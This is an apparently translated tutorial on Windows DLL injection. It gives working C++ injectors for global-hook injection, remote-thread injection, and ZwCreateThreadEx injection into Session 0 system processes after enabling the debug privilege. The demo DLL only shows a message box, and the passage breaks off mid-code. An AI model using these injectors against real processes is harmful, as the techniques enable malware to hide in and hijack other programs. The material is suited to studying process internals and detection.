What is DLL injection

DLL injection is the process of inserting code into a running process. The injected code usually takes the form of a dynamic-link library (DLL), which is loaded on demand at run time (similar to a shared object, .so, on UNIX systems). In practice, code can be injected in many other forms as well, as is common in malware: arbitrary PE files, shellcode, assemblies, and so on.

Global hook injection

In Windows, most applications are message-driven. Each has a message-handling function that performs different actions for different messages. Windows lets these messages be intercepted and monitored through the hook mechanism. A local hook applies to a single thread, while a global hook applies system-wide and is usually implemented in a DLL.

The core function

SetWindowsHookEx

HHOOK WINAPI SetWindowsHookEx(
  __in int       idHook,      // hook type
  __in HOOKPROC  lpfn,        // callback function address
  __in HINSTANCE hMod,        // instance handle
  __in DWORD     dwThreadId   // thread ID
);

Installs an application-defined hook procedure into a hook chain, given the hook type and the address of the callback function. The function returns the hook handle on success, or NULL on failure.

How it works

The hook procedure of a global hook must live in a DLL. Each process has its own address space, so a process in which a hooked event occurs cannot call a hook procedure located in another process's address space. When the hook procedure is implemented in a DLL, the system maps that DLL into the address space of the process where the event occurs, so that the procedure can be called there.

Once a global hook is installed, the operating system loads the hook DLL into any process that receives a message of the hooked type. Setting a global hook therefore achieves DLL injection.

To inject the DLL into as many processes as possible, the program sets a global hook of type WH_GETMESSAGE. Hooks of this type monitor messages retrieved from message queues. Because Windows is message-driven, every process that has a message queue (in practice, any process with a GUI thread) loads the global WH_GETMESSAGE hook DLL.

The WH_GETMESSAGE hook can be installed with the following code, which also checks for success:

BOOL SetHook()
{
    g_Hook = ::SetWindowsHookEx(WH_GETMESSAGE, (HOOKPROC)GetMsgProc, g_hDllModule, 0);
    if (g_Hook == NULL)
    {
        return FALSE;
    }
    return TRUE;
}

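We also need to implement the hook callback, GetMsgProc, which calls the CallNextHookEx API. The first argument of CallNextHookEx is the handle of the current hook (current Windows versions ignore it). Calling CallNextHookEx passes the hook information on to the next hook in the chain; a callback that returns without calling it intercepts the message, so later hooks never see it.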

LRESULT GetMsgProc(int code, WPARAM wParam, LPARAM lParam)
{
    return ::CallNextHookEx(g_Hook, code, wParam, lParam);
}
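To make the role of CallNextHookEx concrete, here is a small portable model of a hook chain. It is only a sketch under stated assumptions: HookChain, HookProc, Next, install and dispatch are hypothetical names invented for illustration, not Windows APIs, and the real chain is maintained by the system rather than by a vector.

```cpp
#include <cassert>
#include <cstddef>
#include <functional>
#include <string>
#include <utility>
#include <vector>

// Hypothetical model of a hook chain; none of these names are Windows APIs.
// A hook procedure receives the message plus a "next" callable that plays
// the role of CallNextHookEx.
using Next = std::function<int(const std::string&)>;
using HookProc = std::function<int(const std::string&, const Next&)>;

class HookChain {
public:
    // Like SetWindowsHookEx, a new hook goes to the beginning of the chain,
    // so the most recently installed hook runs first.
    void install(HookProc proc) {
        assert(proc);  // an empty callback cannot be installed
        procs_.insert(procs_.begin(), std::move(proc));
    }

    // Deliver a message to the head of the chain.
    int dispatch(const std::string& msg) const { return call(0, msg); }

private:
    int call(std::size_t index, const std::string& msg) const {
        if (index >= procs_.size()) {
            return 0;  // end of chain: nothing left to call
        }
        Next next = [this, index](const std::string& m) { return call(index + 1, m); };
        return procs_[index](msg, next);
    }

    std::vector<HookProc> procs_;
};
```

A callback that returns next(msg) behaves like GetMsgProc above and lets the remaining hooks run. A callback that returns without calling next stops the chain at that point.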

Since we installed the hook, we remove it with the UnhookWindowsHookEx API once it is no longer needed:

BOOL UnsetHook()
{
    if (g_Hook)
    {
        ::UnhookWindowsHookEx(g_Hook);
    }
    return TRUE;
}

The hook handle must be visible in every process that loads the DLL, so some form of inter-process communication is needed. There are many options, such as custom messages, pipes, DLL shared sections, and shared memory. Here a shared DLL section is used:

#pragma data_seg("mydata")
HHOOK g_hHook = NULL;
#pragma data_seg()
#pragma comment(linker, "/SECTION:mydata,RWS")

The implementation process

Start by creating a new DLL project.

In the pch.h header file, we declare the functions we define as exported with C linkage, so that their names are not mangled and can be found with GetProcAddress:

extern "C" _declspec(dllexport) BOOL SetHook();
extern "C" _declspec(dllexport) LRESULT GetMsgProc(int code, WPARAM wParam, LPARAM lParam);
extern "C" _declspec(dllexport) BOOL UnsetHook();

Then write the three functions in pch.cpp and create the shared section:

#include "pch.h"
#include <windows.h>
#include <stdio.h>

extern HMODULE g_hDllModule;

// Shared section: g_hHook is shared by every process that loads this DLL
#pragma data_seg("mydata")
HHOOK g_hHook = NULL;
#pragma data_seg()
#pragma comment(linker, "/SECTION:mydata,RWS")

// Hook callback: pass the message on to the next hook
LRESULT GetMsgProc(int code, WPARAM wParam, LPARAM lParam)
{
    return ::CallNextHookEx(g_hHook, code, wParam, lParam);
}

// Set the hook
BOOL SetHook()
{
    g_hHook = SetWindowsHookEx(WH_GETMESSAGE, (HOOKPROC)GetMsgProc, g_hDllModule, 0);
    if (NULL == g_hHook)
    {
        return FALSE;
    }
    return TRUE;
}

// Remove the hook
BOOL UnsetHook()
{
    if (g_hHook)
    {
        UnhookWindowsHookEx(g_hHook);
    }
    return TRUE;
}

Then, in dllmain.cpp, save the module handle on DLL_PROCESS_ATTACH, and compile to generate GolbalDll.dll:

// dllmain.cpp: Defines the entry point for the DLL application.
#include "pch.h"

HMODULE g_hDllModule = NULL;

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        // Remember the module handle; SetHook passes it to SetWindowsHookEx
        g_hDllModule = hModule;
        break;
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Create another console project

In golbalInjectDLL.cpp, use LoadLibraryW to load the DLL, then call its exported SetHook and UnsetHook functions:

// golbalInjectDLL.cpp: This file contains the "main" function. Program execution begins and ends here.
#include <iostream>
#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>

int main()
{
    typedef BOOL (*typedef_SetGlobalHook)();
    typedef BOOL (*typedef_UnsetGlobalHook)();
    HMODULE hDll = NULL;
    typedef_SetGlobalHook SetGlobalHook = NULL;
    typedef_UnsetGlobalHook UnsetGlobalHook = NULL;
    BOOL bRet = FALSE;

    do
    {
        // Backslashes in the path must be escaped in a string literal
        hDll = ::LoadLibraryW(L"F:\\C++\\GolbalDll\\Debug\\GolbalDll.dll");
        if (NULL == hDll)
        {
            printf("LoadLibrary Error[%lu]\n", ::GetLastError());
            break;
        }

        // Look up the exported SetHook function and install the hook
        SetGlobalHook = (typedef_SetGlobalHook)::GetProcAddress(hDll, "SetHook");
        if (NULL == SetGlobalHook)
        {
            printf("GetProcAddress Error[%lu]\n", ::GetLastError());
            break;
        }
        bRet = SetGlobalHook();
        if (bRet)
        {
            printf("SetGlobalHook OK.\n");
        }
        else
        {
            printf("SetGlobalHook ERROR.\n");
        }

        // Keep the hook installed until a key is pressed
        system("pause");

        // Look up the exported UnsetHook function and remove the hook
        UnsetGlobalHook = (typedef_UnsetGlobalHook)::GetProcAddress(hDll, "UnsetHook");
        if (NULL == UnsetGlobalHook)
        {
            printf("GetProcAddress Error[%lu]\n", ::GetLastError());
            break;
        }
        UnsetGlobalHook();
        printf("UnsetGlobalHook OK.\n");
    } while (FALSE);

    system("pause");
    return 0;
}

Run the program to inject GolbalDll.dll.

Remote thread injection

As the name implies, remote thread injection means that one process creates a thread in another process.

The core function

CreateRemoteThread

HANDLE CreateRemoteThread(
  HANDLE                 hProcess,
  LPSECURITY_ATTRIBUTES  lpThreadAttributes,
  SIZE_T                 dwStackSize,
  LPTHREAD_START_ROUTINE lpStartAddress,
  LPVOID                 lpParameter,
  DWORD                  dwCreationFlags,
  LPDWORD                lpThreadId
);

lpStartAddress: a pointer to the application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread; it represents the starting address of the thread in the remote process. The function must exist in the remote process. For more information, see ThreadProc.

lpParameter: a pointer to a variable to be passed to the thread function.

For DLL injection, lpStartAddress is set to the address of LoadLibrary, and lpParameter points to the DLL path.

VirtualAllocEx

Reserves or commits a region of memory in the virtual address space of the specified process. Unless MEM_RESET is specified, the memory is initialized to zero.

LPVOID VirtualAllocEx(
  HANDLE hProcess,
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flAllocationType,
  DWORD  flProtect
);

hProcess: handle to the process in which the memory is allocated.

lpAddress: the desired starting address of the region. Usually NULL is passed so that the system chooses the address.

dwSize: the size of the memory to allocate, in bytes. Note that the size actually allocated is an integer multiple of the page size.

flAllocationType

The following values are available:

MEM_COMMIT: allocates physical storage, in memory or in the paging file on disk, for the specified region of pages.

MEM_PHYSICAL: allocates physical memory (used only with Address Windowing Extensions memory).

MEM_RESERVE: reserves a range of the process's virtual address space without allocating any physical storage. The reserved pages can be committed by a later call to VirtualAlloc().

MEM_RESET: indicates that the data in the memory range specified by lpAddress and dwSize is no longer of interest.

MEM_TOP_DOWN: Allocates memory at the highest possible address (Windows 98 ignores this flag)

MEM_WRITE_WATCH: must be specified with MEM_RESERVE to allow the system to keep track of pages written to the allocated region (Windows 98 only)

flProtect

The following values are available:

PAGE_READONLY: the region is read-only. An attempt by an application to write to a page in the region is denied.

PAGE_READWRITE: the region can be read and written by applications.

PAGE_EXECUTE: the region contains code that can be executed by the system. Attempts to read or write the region are rejected.

PAGE_EXECUTE_READ: the region contains executable code that can be read by applications.

PAGE_EXECUTE_READWRITE: the region contains executable code that applications can read and write.

PAGE_GUARD: a STATUS_GUARD_PAGE exception is raised when the region is accessed for the first time. This flag must be combined with another protection flag, which specifies the access rights that apply after the first access.

PAGE_NOACCESS: any access to the region is rejected.

PAGE_NOCACHE: pages in RAM mapped to the region are not cached by the microprocessor.

Note: the PAGE_GUARD and PAGE_NOCACHE flags can be combined with other flags to further specify the characteristics of a page. PAGE_GUARD marks a guard page: once the page is committed, the first access to it raises a one-shot exception, after which the specified access is granted. PAGE_NOCACHE prevents the page from being cached by the microprocessor when it is mapped to a virtual page. This flag makes it easy for device drivers to share blocks of memory using direct memory access (DMA).
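The dwSize remark above (the allocated size is an integer multiple of the page size) comes down to a round-up calculation. The following is a minimal sketch of that arithmetic, not of VirtualAllocEx itself: round_up_to_pages is a hypothetical helper, and the page size is passed in by the caller as an assumption (4096 bytes is typical on x86/x64 Windows; GetSystemInfo reports the real value).

```cpp
#include <cassert>
#include <cstddef>

// Hypothetical helper: round a requested size up to a whole number of pages.
// page_size is supplied by the caller; it is an assumption, not queried here.
inline std::size_t round_up_to_pages(std::size_t size, std::size_t page_size) {
    assert(page_size != 0);  // a zero page size would divide by zero
    return ((size + page_size - 1) / page_size) * page_size;
}
```

With a 4096-byte page, a request for a 78-byte DLL path still occupies one full page, and a request for 4097 bytes occupies two.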

WriteProcessMemory

This function writes to a memory region of another process (writing to such a region directly would cause an access violation). The entire region to be written must be accessible; otherwise, the operation fails.

BOOL WriteProcessMemory(
  HANDLE  hProcess,                // process handle
  LPVOID  lpBaseAddress,           // base address of the memory to write to
  LPCVOID lpBuffer,                // buffer containing the data to write
  SIZE_T  nSize,                   // number of bytes to write
  SIZE_T *lpNumberOfBytesWritten   // receives the number of bytes written
);

How it works

To use the CreateRemoteThread API, first take a snapshot with CreateToolhelp32Snapshot to find the PID of the target process, then open the process with OpenProcess. Allocate memory in the target process with VirtualAllocEx and write the DLL path into it with WriteProcessMemory. Then use GetProcAddress to obtain the address of LoadLibraryW, and finally create a thread in the target process with CreateRemoteThread.

The address of LoadLibraryW obtained in our own process is also valid in the target process because of how ASLR (base address randomization) behaves. With ASLR, the load address of system DLLs such as kernel32 and ntdll can change at every boot, but it stays fixed until the next reboot. Two different processes therefore see these system DLLs at the same address in their respective virtual address spaces.
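The address argument can be spelled out with a little arithmetic: the address of an exported function is the module's load address plus the export's offset inside the DLL file (its RVA). The sketch below is a portable model only. ModuleView and export_address are hypothetical names, and the base addresses and RVA in the usage note are made-up numbers.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical model: one process's view of a loaded system DLL.
struct ModuleView {
    std::uint64_t base;  // load address of the DLL in this process
};

// Address of an exported function = module base + the export's RVA
// (relative virtual address), which is fixed by the DLL file itself.
inline std::uint64_t export_address(const ModuleView& module, std::uint32_t rva) {
    assert(module.base != 0);  // a zero base would mean the DLL is not loaded
    return module.base + rva;
}
```

If the injector and the target both map the DLL at, say, 0x7FF800000000, then export_address gives the same result in both, which is why the locally obtained LoadLibraryW address can be handed to CreateRemoteThread. The model also shows the limit of the trick: if the two processes load different builds of the DLL (for example a 32-bit injector and a 64-bit target), the bases and RVAs differ and the address no longer matches.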

The implementation process

First build a DLL that simply shows a message box:

// dllmain.cpp: Defines the entry point for the DLL application.
#include "pch.h"

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Shown once, when the DLL is loaded into the process
        MessageBox(NULL, L"success!", L"Congratulation", MB_OK);
        break;
    case DLL_THREAD_ATTACH:
        // Shown whenever a new thread starts in the process
        MessageBox(NULL, L"success!", L"Congratulation", MB_OK);
        break;
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

To do remote thread injection, we need the PID of the target process. Here we use the CreateToolhelp32Snapshot API to take a process snapshot and look up the PID by process name. Note that this code needs #include "tchar.h".

DWORD _GetProcessPID(LPCTSTR lpProcessName)
{
    DWORD Ret = 0;
    PROCESSENTRY32 p32;

    // Take a snapshot of all processes in the system
    HANDLE lpSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (lpSnapshot == INVALID_HANDLE_VALUE)
    {
        printf("Process snapshot failed, please try again! Error:%lu", ::GetLastError());
        return Ret;
    }

    // Walk the snapshot until the process name matches
    p32.dwSize = sizeof(PROCESSENTRY32);
    if (::Process32First(lpSnapshot, &p32))
    {
        do
        {
            if (!lstrcmp(p32.szExeFile, lpProcessName))
            {
                Ret = p32.th32ProcessID;
                break;
            }
        } while (::Process32Next(lpSnapshot, &p32));
    }
    ::CloseHandle(lpSnapshot);
    return Ret;
}

Open the process with OpenProcess

hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, _Pid);

Then allocate memory in the target process using VirtualAllocEx

pAllocMemory = ::VirtualAllocEx(hProcess, NULL, _Size, MEM_COMMIT, PAGE_READWRITE);

Then write the DLL path into that memory using WriteProcessMemory

Write = ::WriteProcessMemory(hProcess, pAllocMemory, DllName, _Size, NULL);
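The size passed to VirtualAllocEx and WriteProcessMemory is a byte count, and it has to cover the terminating null of the path, since LoadLibraryW reads the string until it finds one. A minimal portable sketch of that calculation follows. wide_path_bytes is a hypothetical helper, and char16_t stands in for the 16-bit Windows WCHAR so that the arithmetic is the same on any platform.

```cpp
#include <cassert>
#include <cstddef>
#include <string>

// Hypothetical helper: bytes needed to copy a wide path, terminator included.
// char16_t models the 16-bit WCHAR used by the W family of Windows APIs.
inline std::size_t wide_path_bytes(const std::u16string& path) {
    assert(!path.empty());  // an empty path is not a usable DLL name
    return (path.size() + 1) * sizeof(char16_t);  // +1 for the terminating null
}
```

For the 8-character path C:\a.dll this gives (8 + 1) * 2 = 18 bytes. Passing only the character count, or leaving out the terminator, would write a truncated or unterminated string into the target process.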

Then create the remote thread and wait for the thread function to finish. The second parameter of WaitForSingleObject must be set to INFINITE (equivalent to -1) so that the call waits without a timeout.

hThread = ::CreateRemoteThread(hProcess, NULL, 0, addr, pAllocMemory, 0, NULL);
// Wait for the thread function to finish, then obtain its exit code
WaitForSingleObject(hThread, INFINITE);   // INFINITE is the same value as (DWORD)-1
GetExitCodeThread(hThread, &DllAddr);
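Two details of this step are plain integer arithmetic and can be checked without Windows. The sketch below uses stand-in types, not the real headers: Dword models the 32-bit unsigned DWORD, kInfinite models the INFINITE constant (0xFFFFFFFF), and as_timeout and exit_code_from_handle are hypothetical helpers.

```cpp
#include <cassert>
#include <cstdint>

// Stand-ins for Windows definitions, declared here so the sketch is portable.
using Dword = std::uint32_t;              // models DWORD (32-bit unsigned)
constexpr Dword kInfinite = 0xFFFFFFFFu;  // models INFINITE

// Passing -1 where a DWORD timeout is expected wraps around to 0xFFFFFFFF.
constexpr Dword as_timeout(int value) { return static_cast<Dword>(value); }
static_assert(as_timeout(-1) == kInfinite, "-1 converts to INFINITE");

// A thread exit code is a DWORD, so a 64-bit module handle returned by the
// thread function survives only as its low 32 bits.
inline Dword exit_code_from_handle(std::uint64_t module_handle) {
    assert(module_handle != 0);  // 0 would mean the load failed
    return static_cast<Dword>(module_handle & 0xFFFFFFFFu);
}
```

The first helper shows why -1 and INFINITE are interchangeable as the timeout. The second shows why, in a 64-bit target, the value read by GetExitCodeThread is only useful as a success indicator (non-zero) and not as the full address at which the DLL was loaded.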

The complete code is as follows

// RemoteThreadInject.cpp: This file contains the "main" function. Program execution begins and ends here.
#include <iostream>
#include <stdio.h>
#include <windows.h>
#include <TlHelp32.h>
#include "tchar.h"

char string_inject[] = "F:\\C++\\Inject\\Inject\\Debug\\Inject.dll";

// Look up the PID of a process by name
DWORD _GetProcessPID(LPCTSTR lpProcessName)
{
    DWORD Ret = 0;
    PROCESSENTRY32 p32;
    HANDLE lpSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (lpSnapshot == INVALID_HANDLE_VALUE)
    {
        printf("Process snapshot failed, please try again! Error:%lu", ::GetLastError());
        return Ret;
    }
    p32.dwSize = sizeof(PROCESSENTRY32);
    if (::Process32First(lpSnapshot, &p32))
    {
        do
        {
            if (!lstrcmp(p32.szExeFile, lpProcessName))
            {
                Ret = p32.th32ProcessID;
                break;
            }
        } while (::Process32Next(lpSnapshot, &p32));
    }
    ::CloseHandle(lpSnapshot);
    return Ret;
}

// Open a process and create a thread in it
DWORD _RemoteThreadInject(DWORD _Pid, LPCWSTR DllName)
{
    HANDLE hProcess;
    HANDLE hThread;
    DWORD _Size = 0;
    BOOL Write = 0;
    LPVOID pAllocMemory = NULL;
    DWORD DllAddr = 0;
    FARPROC pThread;

    // Open the target process
    hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, _Pid);
    if (hProcess == NULL)
    {
        printf("OpenProcess - Error!");
        return FALSE;
    }

    // Size of the DLL path in bytes, including the terminating null
    //Size = sizeof(string_inject);
    _Size = (DWORD)((wcslen(DllName) + 1) * sizeof(WCHAR));

    // Allocate memory in the target process
    pAllocMemory = ::VirtualAllocEx(hProcess, NULL, _Size, MEM_COMMIT, PAGE_READWRITE);
    if (pAllocMemory == NULL)
    {
        printf("VirtualAllocEx - Error!");
        return FALSE;
    }

    // Write the DLL path into the allocated memory
    Write = ::WriteProcessMemory(hProcess, pAllocMemory, DllName, _Size, NULL);
    if (Write == FALSE)
    {
        printf("WriteProcessMemory - Error!");
        return FALSE;
    }

    // Get the address of LoadLibraryW
    pThread = ::GetProcAddress(::GetModuleHandle(L"kernel32.dll"), "LoadLibraryW");
    LPTHREAD_START_ROUTINE addr = (LPTHREAD_START_ROUTINE)pThread;

    // Create the remote thread
    hThread = ::CreateRemoteThread(hProcess, NULL, 0, addr, pAllocMemory, 0, NULL);
    if (hThread == NULL)
    {
        printf("CreateRemoteThread - Error!");
        return FALSE;
    }

    // Wait for the thread function to finish, then obtain its exit code
    WaitForSingleObject(hThread, INFINITE);
    GetExitCodeThread(hThread, &DllAddr);

    // Release the memory that held the DLL path
    VirtualFreeEx(hProcess, pAllocMemory, _Size, MEM_DECOMMIT);

    // Close the handles
    ::CloseHandle(hThread);
    ::CloseHandle(hProcess);
    return TRUE;
}

int main()
{
    DWORD PID = _GetProcessPID(L"test.exe");
    _RemoteThreadInject(PID, L"F:\\C++\\Inject\\Inject\\Debug\\Inject.dll");
}

Then build a test.exe to serve as the injection target.

Compile and run with the following results

Remote thread injection that breaks through Session 0 isolation

First, some background for the concept of Session 0:

The Intel CPU has four privilege levels: RING0, RING1, RING2, and RING3. Windows uses only two of them, RING0 and RING3. RING0 is reserved for the operating system, while RING3 can be used by any program. If an ordinary application attempts to execute a RING0 instruction, Windows reports an “illegal instruction” error.

A ring is a CPU run level. Ring0 is the most privileged level, followed by Ring1, Ring2, and so on. Taking Linux on x86 as an example, the operating system (kernel) code runs at Ring0 and can use privileged instructions to control interrupts, modify page tables, access devices, and so on. Application code runs at Ring3, the least privileged level, and cannot perform these restricted operations. To access a disk or write a file, for example, an application must execute a system call. During the system call, the CPU switches from Ring3 to Ring0 and jumps to the kernel code for that call; the kernel performs the device access on the application's behalf and then returns from Ring0 to Ring3. This process is also known as switching between user mode and kernel mode.

The rings were designed to separate system privileges from those of programs, so that the OS can better manage system resources and the system is more stable. The simplest example: when an application running at a ring less privileged than RING0 stops responding, there is no need to worry much about how to get the system working again. You can simply launch Task Manager and terminate the application, because the operating system runs at RING0, has higher privileges, and can directly control the programs running in the rings above it. Of course, there are disadvantages as well as advantages. The rings keep the system stable, but they also cause some very troublesome problems. For example, some OS virtualization technologies run into trouble with the ring model: an operating system runs at RING0, but a guest OS is also an operating system and needs matching privileges, and RING0 does not allow more than one OS to run in it at the same time. The earliest solution was to use a virtual machine and run the guest OS as an ordinary program.

The core function

ZwCreateThreadEx

Note that the ZwCreateThreadEx function is declared differently on 32-bit and 64-bit systems.

In the 32-bit case

DWORD WINAPI ZwCreateThreadEx(
    PHANDLE ThreadHandle,
    ACCESS_MASK DesiredAccess,
    LPVOID ObjectAttributes,
    HANDLE ProcessHandle,
    LPTHREAD_START_ROUTINE lpStartAddress,
    LPVOID lpParameter,
    BOOL CreateSuspended,
    DWORD dwStackSize,
    DWORD dw1,
    DWORD dw2,
    LPVOID pUnkown);

In the 64-bit case

DWORD WINAPI ZwCreateThreadEx(
    PHANDLE ThreadHandle,
    ACCESS_MASK DesiredAccess,
    LPVOID ObjectAttributes,
    HANDLE ProcessHandle,
    LPTHREAD_START_ROUTINE lpStartAddress,
    LPVOID lpParameter,
    ULONG CreateThreadFlags,
    SIZE_T ZeroBits,
    SIZE_T StackSize,
    SIZE_T MaximumStackSize,
    LPVOID pUnkown);

Because we are going to inject into Session 0, we need system privileges, so a few other functions are needed to elevate our privileges.

OpenProcessToken

BOOL OpenProcessToken(
  __in  HANDLE  ProcessHandle,
  __in  DWORD   DesiredAccess,
  __out PHANDLE TokenHandle    // receives the access token handle
);

LookupPrivilegeValueA

BOOL LookupPrivilegeValueA(
  LPCSTR lpSystemName,
  LPCSTR lpName,       // name of the privilege
  PLUID  lpLuid        // receives the LUID that identifies the named privilege
);

AdjustTokenPrivileges

BOOL AdjustTokenPrivileges(
  HANDLE            TokenHandle,
  BOOL              DisableAllPrivileges,
  PTOKEN_PRIVILEGES NewState,        // pointer to the new privileges
  DWORD             BufferLength,
  PTOKEN_PRIVILEGES PreviousState,   // buffer that receives the previous state of the changed privileges
  PDWORD            ReturnLength     // receives the buffer size required for PreviousState
);

How it works

ZwCreateThreadEx is lower-level than CreateRemoteThread; CreateRemoteThread ultimately creates the thread by calling ZwCreateThreadEx.

Creating remote threads by calling CreateRemoteThread worked perfectly well before kernel 6.0, but kernel 6.0 and later (Windows Vista, 7, 8, and so on) introduced session isolation. With it, a newly created thread does not run immediately: it is first suspended, and whether it is resumed is decided after checking the session in which the target runs.

On Windows XP, Windows Server 2003, and older versions of Windows, services and applications run using the same Session, which is started by the first user to log on to the console. This Session is called Session 0, as shown below. Before Windows Vista, Session 0 contained not only services but also standard user applications.

Running services in Session 0 together with user applications creates a security risk, because services run with elevated privileges while user applications run with user privileges (mostly as non-administrator users). This allows malware to target a service and “hijack” it in order to elevate its own privileges.

Starting with Windows Vista, only services can be hosted in Session 0, and user applications are isolated from services and need to run in subsequent sessions created when the user logs on to the system. For example, the first login user creates Session 1, the second login user creates Session 2, and so on, as shown in the following figure.

The injection fails because of the seventh parameter, CreateThreadFlags: it causes the thread to be suspended after creation and never resumed. To inject successfully, pass 0 for this parameter.

The implementation process

On Windows 10, injecting into a process that runs with system privileges requires the debug privilege, so first write a privilege-elevation function.

BOOL EnableDebugPrivilege()
{
    HANDLE hToken;
    BOOL fOk = FALSE;
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
    {
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount = 1;
        // Look up the LUID of the debug privilege and mark it as enabled
        LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
        // AdjustTokenPrivileges can return TRUE without granting the privilege,
        // so the last error is what tells us whether it succeeded
        fOk = (GetLastError() == ERROR_SUCCESS);
        CloseHandle(hToken);
    }
    return fOk;
}

A DLL injected into a system process cannot use MessageBox, because system programs cannot display windows to the user. For the injector itself, we write a ShowError function that reports the error code:

void ShowError(const char *pszText)
{
    char szError[MAX_PATH] = { 0 };
    // The A variants are used explicitly because the buffer is a char array
    ::wsprintfA(szError, "%s Error[%d]\n", pszText, ::GetLastError());
    ::MessageBoxA(NULL, szError, "ERROR", MB_OK);
}

First open the process to get its handle, using OpenProcess

hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);

Then allocate memory in the target process, using VirtualAllocEx

pDllAddr = ::VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);

Write the DLL path to that memory using WriteProcessMemory

WriteProcessMemory(hProcess, pDllAddr, pszDllFileName, dwSize, NULL);

Load ntdll.dll and get the address of the LoadLibraryA function

HMODULE hNtdllDll = ::LoadLibraryA("ntdll.dll");

pFuncProcAddr = ::GetProcAddress(::GetModuleHandleA("Kernel32.dll"), "LoadLibraryA");

Get the address of the ZwCreateThreadEx function

typedef_ZwCreateThreadEx ZwCreateThreadEx = (typedef_ZwCreateThreadEx)::GetProcAddress(hNtdllDll, "ZwCreateThreadEx");

Use ZwCreateThreadEx to create a remote thread for DLL injection

dwStatus = ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)pFuncProcAddr, pDllAddr, 0, 0, 0, 0, NULL);

One other thing to note is that ZwCreateThreadEx is exported by ntdll.dll but is not declared in any header, so we need GetProcAddress to obtain the address of this export from ntdll.dll.

Here we add the ZwCreateThreadEx function pointer type. Two definitions are needed because the 64-bit and 32-bit declarations differ.

#ifdef _WIN64
    typedef DWORD (WINAPI *typedef_ZwCreateThreadEx)(
        PHANDLE ThreadHandle,
        ACCESS_MASK DesiredAccess,
        LPVOID ObjectAttributes,
        HANDLE ProcessHandle,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID lpParameter,
        ULONG CreateThreadFlags,
        SIZE_T ZeroBits,
        SIZE_T StackSize,
        SIZE_T MaximumStackSize,
        LPVOID pUnkown);
#else
    typedef DWORD (WINAPI *typedef_ZwCreateThreadEx)(
        PHANDLE ThreadHandle,
        ACCESS_MASK DesiredAccess,
        LPVOID ObjectAttributes,
        HANDLE ProcessHandle,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID lpParameter,
        BOOL CreateSuspended,
        DWORD dwStackSize,
        DWORD dw1,
        DWORD dw2,
        LPVOID pUnkown);
#endif

The complete code is as follows

// session0Inject.cpp: This file contains the "main" function. Program execution begins and ends here.
#include <Windows.h>
#include <stdio.h>
#include <iostream>

void ShowError(const char *pszText)
{
    char szError[MAX_PATH] = { 0 };
    ::wsprintfA(szError, "%s Error[%d]\n", pszText, ::GetLastError());
    ::MessageBoxA(NULL, szError, "ERROR", MB_OK);
}

// Enable the debug privilege
BOOL EnableDebugPrivilege()
{
    HANDLE hToken;
    BOOL fOk = FALSE;
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
    {
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount = 1;
        LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
        fOk = (GetLastError() == ERROR_SUCCESS);
        CloseHandle(hToken);
    }
    return fOk;
}

// Remote thread injection using ZwCreateThreadEx
BOOL ZwCreateThreadExInjectDll(DWORD PID, const char *pszDllFileName)
{
    HANDLE hProcess = NULL;
    SIZE_T dwSize = 0;
    LPVOID pDllAddr = NULL;
    FARPROC pFuncProcAddr = NULL;
    HANDLE hRemoteThread = NULL;
    DWORD dwStatus = 0;

    EnableDebugPrivilege();

    // Open the target process
    hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
    if (hProcess == NULL)
    {
        printf("OpenProcess - Error! \n\n");
        return FALSE;
    }

    // Allocate memory in the target process for the DLL path
    dwSize = ::lstrlenA(pszDllFileName) + 1;
    pDllAddr = ::VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
    if (NULL == pDllAddr)
    {
        ShowError("VirtualAllocEx - Error! \n\n");
        return FALSE;
    }

    // Write the DLL path into the allocated memory
    if (FALSE == ::WriteProcessMemory(hProcess, pDllAddr, pszDllFileName, dwSize, NULL))
    {
        ShowError("WriteProcessMemory - Error! \n\n");
        return FALSE;
    }

    // Load ntdll.dll
    HMODULE hNtdllDll = ::LoadLibraryA("ntdll.dll");
    if (NULL == hNtdllDll)
    {
        ShowError("LoadLibrary");
        return FALSE;
    }

    // Get the address of LoadLibraryA
    pFuncProcAddr = ::GetProcAddress(::GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
    if (NULL == pFuncProcAddr)
    {
        ShowError("GetProcAddress_LoadLibraryA - Error! \n\n");
        return FALSE;
    }

#ifdef _WIN64
